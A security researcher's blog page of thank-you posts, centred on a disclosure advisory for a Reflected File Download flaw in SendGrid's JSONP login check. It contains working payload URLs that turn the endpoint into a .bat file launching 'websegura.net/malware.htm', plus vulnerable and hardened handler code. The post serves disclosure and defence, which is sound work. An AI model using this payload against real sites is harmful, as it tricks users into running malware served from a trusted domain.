David Sopas – Web Security Researcher

tshirt

09/11/15 Swag

Thanks Edmodo for the swag

Got some cool gifts from Edmodo. Always glad to help others improve their security 🙂

28/10/15 Advisories, Swag

SendGrid Reflected File Download

For those who don’t know who SendGrid is…

SendGrid provides unmatched deliverability, scalability, and reliability. We deliver email on behalf of happy customers such as: Airbnb, Foursquare, Spotify and Uber.

They send over 19 billion emails per month.

When visiting their site I noticed an XHR request in the Chrome inspector that caught my attention:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565&_=1439389801826

Which returned the following JSON information:

/**/jQuery171016384647646918893_1439389801565({"status":"success","logged_in":false});

The callback name was reflected from the URL straight into the response body (with the parameter repeated, the endpoint used the last value), so I injected my RFD vector in its place:

https://sendgrid.com/user/checkLogin?callback=mycallback&callback=||start chrome websegura.net/malware.htm||

Which was reflected as:

/**/||start chrome websegura.net/malware.htm||({"status":"success","logged_in":false});

Saved with a .bat extension this is a working batch script: cmd.exe fails to run /**/ as a command, the || operator then executes start chrome websegura.net/malware.htm, and the trailing part after the second || only runs if start itself fails.

Now that I could reflect my payload, I removed the parameters that do nothing for the proof-of-concept and tried to control the filename through an extra path segment, which the server accepted without returning an HTTP error:

https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||

On Internet Explorer 8 and 9 nothing else was needed: opening that URL prompted the user to download freecoupons.bat, apparently served by sendgrid.com.

[Screenshot: ie_sendgrid_rfd]

On the other modern browsers of the time you needed the HTML5 download attribute on a link pointing at that URL; the download then started just by clicking the image. Note that current browsers (Chrome since version 65, and Firefox) ignore the download attribute on cross-origin links, so this variant of the attack no longer works as it did in 2015.

[Screenshot: chrome_sendgrid_rfd]

A malicious user could:

  1. Launch a malicious campaign with a specially crafted page offering SendGrid.com coupon codes
  2. The victim downloads the file believing it comes from a trusted domain [SendGrid.com]
  3. The attacker gains control of the victim's machine
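To make the root cause and the fix concrete, here is an added example (not SendGrid's code) of a minimal JSONP handler modelled on the checkLogin endpoint above, once as it behaved (prefix-matched route, callback reflected unchecked, filename left to the URL) and once hardened (exact route, callback restricted to an identifier, filename pinned by the server, MIME sniffing disabled). The route handling, header values and function names are assumptions made for this illustration; the two request URLs are the ones from the write-up.

```javascript
// Added example, not SendGrid's code. Node.js, uses only the built-in WHATWG URL API.

const JSON_BODY = '{"status":"success","logged_in":false}';

// Last value wins for a repeated parameter, which is why
// "?callback=mycallback&callback=<payload>" reflected the payload.
function lastParam(u, name) {
  const all = u.searchParams.getAll(name);
  return all.length ? all[all.length - 1] : null;
}

// Vulnerable (assumed behaviour): the route is prefix-matched, so
// "/user/checkLogin/freecoupons.bat" still reaches the handler and the
// browser takes the filename from that last path segment; the callback
// goes into the body without any validation.
function checkLoginVulnerable(url) {
  const u = new URL(url);
  if (!u.pathname.startsWith("/user/checkLogin")) {
    return { status: 404, headers: {}, body: "" };
  }
  const cb = lastParam(u, "callback") || "callback";
  return {
    status: 200,
    headers: { "Content-Type": "application/javascript" },
    body: `/**/${cb}(${JSON_BODY});`,
  };
}

// Hardened: only a short JavaScript identifier is accepted as callback,
// the route must match exactly, the filename is fixed server-side and
// the response may not be sniffed into something else.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]{0,63}$/;

function checkLoginHardened(url) {
  const u = new URL(url);
  if (u.pathname !== "/user/checkLogin") {
    return { status: 404, headers: {}, body: "" };
  }
  const cb = lastParam(u, "callback") || "callback";
  if (!CALLBACK_RE.test(cb)) {
    return {
      status: 400,
      headers: { "Content-Type": "application/json" },
      body: '{"error":"invalid callback"}',
    };
  }
  return {
    status: 200,
    headers: {
      "Content-Type": "application/javascript; charset=utf-8",
      "Content-Disposition": 'inline; filename="checkLogin.js"',
      "X-Content-Type-Options": "nosniff",
    },
    body: `/**/${cb}(${JSON_BODY});`,
  };
}

// Constructed requests, copied from the advisory above.
const LEGIT_URL =
  "https://sendgrid.com/user/checkLogin?callback=mycallback&callback=jQuery171016384647646918893_1439389801565&_=1439389801826";
const RFD_URL =
  "https://sendgrid.com/user/checkLogin/freecoupons.bat?&callback=||start chrome websegura.net/malware.htm||";
// Same payload on the exact route, to show the callback check alone rejects it.
const RFD_EXACT_ROUTE_URL =
  "https://sendgrid.com/user/checkLogin?callback=||start chrome websegura.net/malware.htm||";

function demo() {
  return {
    legitVuln: checkLoginVulnerable(LEGIT_URL),
    rfdVuln: checkLoginVulnerable(RFD_URL),
    legitHard: checkLoginHardened(LEGIT_URL),
    rfdHard: checkLoginHardened(RFD_URL),
    rfdHardExactRoute: checkLoginHardened(RFD_EXACT_ROUTE_URL),
  };
}

for (const [name, r] of Object.entries(demo())) {
  console.log(name, r.status, r.body);
}
```

The vulnerable handler reproduces both responses quoted above byte for byte; the hardened one answers the RFD URL with 404 (route) and the same payload on the exact route with 400 (callback), while a normal jQuery callback still works and now carries a server-chosen filename.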

SendGrid were always on top of the issue [cool guys] and they were nice enough to send me an awesome t-shirt 🙂

Timeline:
12-08-2015 Reported this security issue to SendGrid
20-08-2015 SendGrid replied that they were fixing the issue
29-09-2015 Asked for an update
27-10-2015 SendGrid reported that the issue is fixed

18/08/15 Swag

Tshirt, deck of cards and stickers from Cobalt.io

I would like to thank Cobalt.io team for the gift pack they sent me.
Working with them is awesome and I hope to keep helping and growing with you guys.

PS: Nice to be a Ace of Diamonds 🙂

Cheers!

03/08/15 Swag

Mixpanel gave me a cool Tshirt

When I help companies to fix security issues I do not ask anything in return.

I came across a security issue on Mixpanel when auditing a private client on Cobalt.io, and I sent Mixpanel a short security advisory describing a Reflected File Download vulnerability with a couple of screenshots.
Mixpanel security team fixed the vulnerability very fast showing that they care about security.
